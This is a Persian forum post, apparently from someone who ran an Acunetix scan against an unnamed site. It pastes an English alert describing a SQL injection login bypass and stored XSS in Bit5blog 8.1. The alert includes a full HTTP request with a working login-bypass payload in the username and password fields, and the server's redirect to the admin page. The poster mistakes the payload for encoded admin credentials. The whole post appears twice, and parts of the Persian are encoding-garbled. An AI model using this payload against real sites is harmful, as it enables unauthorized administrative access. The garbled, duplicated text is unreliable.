با سلام و تبريک سال جديد
دوستان گرامی بنده سايتي را با Acunetix Web Vulnerability Scanner اسکن کردم Ùˆ در قسمت alert چند مورد پيدا کرد Ú©Ù‡ در اينجا 1 مورد را قرار ميدم Ú©Ù‡ اگر راهنمايي بÙرماييد ممنون ميشم.
Bit5blog v.8.1 SQL Injection and Login Bypass
Vulnerability de******ion
1) Input passed to the "username" and "password" parameters in "processlogin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed to the "comment" parameter in "addcomment.php" isn't properly sanitised before being used. This can be exploited to inject arbitrary ****** code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.
Example: <a href="**********:">[text]</a>
Confirmed in version 8.1. Other versions may also be affected.
This vulnerability affects /html/admin/processlogin.php.
The impact of this vulnerability
A remote user can execute SQL commands on the underlying database, bypass login sequence and inject arbitrary ****** code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.
Attack details
No details are available.
View HTTP headers
Request
POST /html/admin/processlogin.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: ******
Content-Length: 75
Connection: Close
Pragma: no-cache
username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
Response
HTTP/1.0 302 Moved Temporarily
Date: Wed, 04 Apr 2007 1915 GMT
Server: Apache Powered Server
X-Powered-By: PHP/4.3.10-19
Set-****ie: POSTNUKESID=9784a42198ce619d7e937bf02958fadb; path=/html/admin
Expires: Thu, 19 Nov 1981 0800 GMT
Cache-Control: cache
Pragma: no-cache
Location: ******/html/admin/index.php
Content-Type: text/html
X-Cache: MISS from Cache
X-Cache-Lookup: MISS from Cache:3128
Connection: close View HTML response
Launch the attack with HTTP Editor
How to fix this vulnerability
Edit the source code to ensure that input is properly sanitised.
Web references
Secunia SA18464
Product Homepage
چند مورد ديگر رو هم بعدا قرار ميدم تو اين مطالب يه قسمتي اشاره به user و pass هم داره آيا اينها ماله مديريت هست که بايد decode بشه؟؟
username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
اسم سايت را به صورت ****** قرار دادم.
با سپاس از راهنمايي شما
دوستان گرامی بنده سايتي را با Acunetix Web Vulnerability Scanner اسکن کردم Ùˆ در قسمت alert چند مورد پيدا کرد Ú©Ù‡ در اينجا 1 مورد را قرار ميدم Ú©Ù‡ اگر راهنمايي بÙرماييد ممنون ميشم.
Bit5blog v.8.1 SQL Injection and Login Bypass
Vulnerability de******ion
1) Input passed to the "username" and "password" parameters in "processlogin.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed to the "comment" parameter in "addcomment.php" isn't properly sanitised before being used. This can be exploited to inject arbitrary ****** code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.
Example: <a href="**********:">[text]</a>
Confirmed in version 8.1. Other versions may also be affected.
This vulnerability affects /html/admin/processlogin.php.
The impact of this vulnerability
A remote user can execute SQL commands on the underlying database, bypass login sequence and inject arbitrary ****** code, which will be executed in a user's browser session in context of an affected site when the malicious user data is viewed.
Attack details
No details are available.
View HTTP headers
Request
POST /html/admin/processlogin.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: ******
Content-Length: 75
Connection: Close
Pragma: no-cache
username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
Response
HTTP/1.0 302 Moved Temporarily
Date: Wed, 04 Apr 2007 1915 GMT
Server: Apache Powered Server
X-Powered-By: PHP/4.3.10-19
Set-****ie: POSTNUKESID=9784a42198ce619d7e937bf02958fadb; path=/html/admin
Expires: Thu, 19 Nov 1981 0800 GMT
Cache-Control: cache
Pragma: no-cache
Location: ******/html/admin/index.php
Content-Type: text/html
X-Cache: MISS from Cache
X-Cache-Lookup: MISS from Cache:3128
Connection: close View HTML response
Launch the attack with HTTP Editor
How to fix this vulnerability
Edit the source code to ensure that input is properly sanitised.
Web references
Secunia SA18464
Product Homepage
چند مورد ديگر رو هم بعدا قرار ميدم تو اين مطالب يه قسمتي اشاره به user و pass هم داره آيا اينها ماله مديريت هست که بايد decode بشه؟؟
username=%27+or+isnull%281%2F0%29%2F*&password=%27 +or+isnull%281%2F0%29%2F*
اسم سايت را به صورت ****** قرار دادم.
با سپاس از راهنمايي شما
Comment